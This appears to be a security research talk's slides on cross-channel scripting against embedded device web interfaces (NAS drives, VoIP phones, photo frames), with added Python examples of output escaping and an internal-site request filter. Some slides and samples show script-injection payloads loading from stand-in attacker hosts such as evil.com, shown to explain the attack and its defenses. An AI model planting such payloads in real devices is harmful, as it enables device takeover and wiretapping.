SLIDE 1 Stanford Computer Security Lab
Cross-Channel Scripting
Impact on Embedded Web Interfaces
Hristo Bojinov, Elie Bursztein, Dan Boneh
Stanford Computer Security Lab
SLIDE 7 Cross-channel scripting
[Diagram, built up over slides 2-7: Service A (Protocol A, e.g. iCal) and Service B (Protocol B, e.g. HTTP) share state on the vulnerable system. Injection happens over Protocol A; execution happens over Protocol B.]
XCS: a pervasive attack class
- secure services ≠ secure system
SLIDE 8 Cross-channel scripting
LaCie Ethernet disk mini
- Share access control
- Web interface
- Public FTP
SLIDE 11 Cross-channel scripting
[Diagram, built up over slides 9-12: NAS with FTP server, file system and web app; attacker on one side, admin browser on the other]
Attacker uploads a file over FTP: <script>..</script>.pdf
Web app reflects the filename to the admin browser: <script>..</script>.pdf
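The NAS case above as an added example, not code from the slides or from any vendor: a hypothetical file-listing renderer for the admin page, first as the slides describe it (filename pasted into HTML) and then escaped at the output boundary, plus a small audit check over the same constructed directory entries.

```python
"""Added example: FTP-uploaded filename reflected by a NAS web interface.
All function names and the sample entries are constructed for illustration."""
import html
import re

# Constructed sample: directory entries as the FTP server leaves them on disk.
# The third name is the kind of payload the slides show.
SAMPLE_FILES = [
    "holiday.jpg",
    "report & notes.pdf",
    '<script src="//evil.example/x.js"></script>.pdf',
]

def render_listing_vulnerable(names):
    """Builds the admin page's file table by string concatenation.
    The name arrived over FTP, never over HTTP, so a filter on the web
    channel alone never sees it; once rendered it is ordinary XSS."""
    rows = "".join(f"<tr><td>{n}</td></tr>" for n in names)
    return f"<table>{rows}</table>"

def render_listing_safe(names):
    """Same page, but every value is HTML-escaped where it meets the markup.
    Escaping on output covers every ingress channel (FTP, SIP, torrent...)
    because it does not depend on where the string came from."""
    rows = "".join(f"<tr><td>{html.escape(n, quote=True)}</td></tr>"
                   for n in names)
    return f"<table>{rows}</table>"

# Hypothetical audit check: flag stored names carrying HTML metacharacters so
# an upload log review can surface an injection attempt on a non-web channel.
HTML_META = re.compile(r'[<>"\']')

def suspicious_names(names):
    return [n for n in names if HTML_META.search(n)]

if __name__ == "__main__":
    print(render_listing_vulnerable(SAMPLE_FILES))
    print(render_listing_safe(SAMPLE_FILES))
    print(suspicious_names(SAMPLE_FILES))
```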
SLIDE 14 Talk overview
Part 1: Many examples of XCS
- Phones: 5 XCS vulnerabilities in 2 phones
- Embedded: 23 devices, 26 XCS vulnerabilities
- RESTful APIs: 2 major APIs, 2 XCS vulnerabilities
Part 2: Defenses against XCS
SLIDE 15 Stanford Computer Security Lab
More XCS Examples
SLIDE 16
Embedded web interfaces?
SLIDE 17 Embedded vs. public web servers
[Chart: growth, in millions, 2008-2013, of Internet web servers vs. embedded web servers (NAS and photo frame only)]
Data:
- Parks Associates
- Netcraft
SLIDE 18 Web management interfaces
Managing embedded devices via a web interface:
✓ Easier for users
✓ Cheaper for vendors
SLIDE 19 Recipe for a disaster
Vendors build their own web applications
- Standard web server (sometimes)
- Custom web application stack
- Weak web security
New features/services added at a fast pace
- Vendors compete on number of services in product
- Interactions between services ➽ vulnerabilities
SLIDE 20
Outcome
Vulnerabilities in every device we audited
SLIDE 21 VoIP phone
- Linksys SPA942
- Web interface
- SIP support
- Call logs
SIP XCS
SLIDE 26 SIP XCS
1. Attacker makes a call as “<script src="//evil.com/"></script>”
2. Administrator accesses web interface
3. Payload executes
Outcome: phone reconfiguration, VoIP wiretapping...
SLIDE 27 WiFi photo frame
- Samsung SPF85V
- RSS / URL feed
- Windows Live
- WMV / AVI
Photo frame XCS
SLIDE 31 Photo frame XCS
1. Attacker infects via CSRF
2. User connects to manage
3. Payload executes
Frame Error! Call Support: 1-900-PWNED
SLIDE 39 Devices as stepping stones
1. Administer the device
2. Browse internet
3. Trigger POST (e.g. via Ads)
4. Infect the device
5. Access files
6. Send malicious payload
7. Attack local network
SLIDE 40 SOHO NAS
- Buffalo LS-CHL
- BitTorrent support!
Another boring NAS device?
SLIDE 45 Massive exploitation
[Diagram, built up over slides 41-45: Internet; create a bad torrent: Famous_movie.torrent]
SLIDE 46
Peer-to-peer XCS!
SLIDE 47 Stanford Computer Security Lab
Defenses
SLIDE 50 Cross-channel scripting
[Diagram, built up over slides 48-50: Service A (Protocol A) and Service B (Protocol B) on the vulnerable system; injection over Protocol A, execution over Protocol B]
Blocking at the injection side: Difficult
Blocking at the execution side: Feasible
SLIDE 51
Security policies in browsers
SLIDE 52 Security policies in browsers
Strict Transport Security
- ForceHTTPS [JB’08]
- Stateful, and site-wide
- Recently adopted by PayPal
- Several browser implementations
SLIDE 55 Security policies in browsers
Same Origin Mutual Approval [OWvOS’08]
- Manifest delivery, stateless, site-wide
Mozilla Content Security Policy
- Header delivery, stateless, fine-grained
SiteFirewall
- Header delivery, stateful, site-wide
SLIDE 56 SiteFirewall
SiteFirewall (a Firefox extension) prevents internal websites from accessing the Internet.
[Diagram: internal website, browser, Internet]
SLIDE 58 SiteFirewall
Before: injected script can issue requests at will: <script src="http://evil.com">
SLIDE 59 SiteFirewall
After: page interactions with the Internet blocked.
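The before/after behaviour above as an added example, not SiteFirewall's own code: the rule "a page served from an internal host may not reach the Internet" written as an offline request filter. The HOSTS map stands in for DNS and the function names are hypothetical; "internal" is taken to mean any address that is not globally routable.

```python
"""Added example: the SiteFirewall policy as a request filter.
HOSTS, the addresses in it and all function names are constructed."""
import ipaddress
from urllib.parse import urlsplit

# Constructed stand-in for DNS so the example runs without network access.
HOSTS = {
    "nas.home": "192.168.1.20",       # embedded web interface on the LAN
    "router.home": "10.0.0.1",
    "evil.example": "93.184.216.34",  # public address, stands in for an attacker host
    "cdn.example": "151.101.1.69",    # public address, an ordinary Internet site
}

def resolve(host):
    """Literal IP or a name in HOSTS -> ip_address; None if unknown."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return ipaddress.ip_address(HOSTS[host]) if host in HOSTS else None

def is_internal(host):
    """Internal = resolvable and not globally routable (RFC 1918, loopback, link-local)."""
    ip = resolve(host)
    return ip is not None and not ip.is_global

def should_block(page_url, request_url):
    """SiteFirewall rule. A page on an internal host may talk to its own host and
    to other internal hosts; any request to a public or unresolvable host is
    blocked, which is exactly what an injected <script src="http://evil..."> needs."""
    page_host = urlsplit(page_url).hostname or ""
    dest_host = urlsplit(request_url).hostname or ""
    if not is_internal(page_host):
        return False          # policy applies only to internal sites
    if dest_host == page_host:
        return False          # the page's own origin
    return not is_internal(dest_host)

def filter_requests(page_url, request_urls):
    """Partition a page's outgoing requests into (allowed, blocked) lists."""
    allowed, blocked = [], []
    for url in request_urls:
        (blocked if should_block(page_url, url) else allowed).append(url)
    return allowed, blocked

if __name__ == "__main__":
    print(filter_requests("http://nas.home/admin/files.cgi",
                          ["http://nas.home/style.css", "http://evil.example/x.js"]))
```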
SLIDE 60
Thinking beyond cookies
SLIDE 62 Thinking beyond cookies
Policy delivery mechanisms:
- Manifest files, cookies, custom headers, DNS, certs
Different types of browser state:
- Cookies for web application state
- Policy store for web site security policies
SLIDE 63 Stanford Computer Security Lab
Conclusion
SLIDE 64
A growing threat
As seen on Twitter...
SLIDE 65
A growing threat
... and a smartphone near you.
SLIDE 67 Conclusion
Rise of multi-protocol devices: XCS
Rise of browser-OS: 24x7 exploitability
Recommendations
- HTTP: cross-site policy standard
- Browser: security policy store (non-cookie)
Thanks to Eric Lovett and Parks Associates!
SLIDE 68 Stanford Computer Security Lab
Questions?
http://seclab.stanford.edu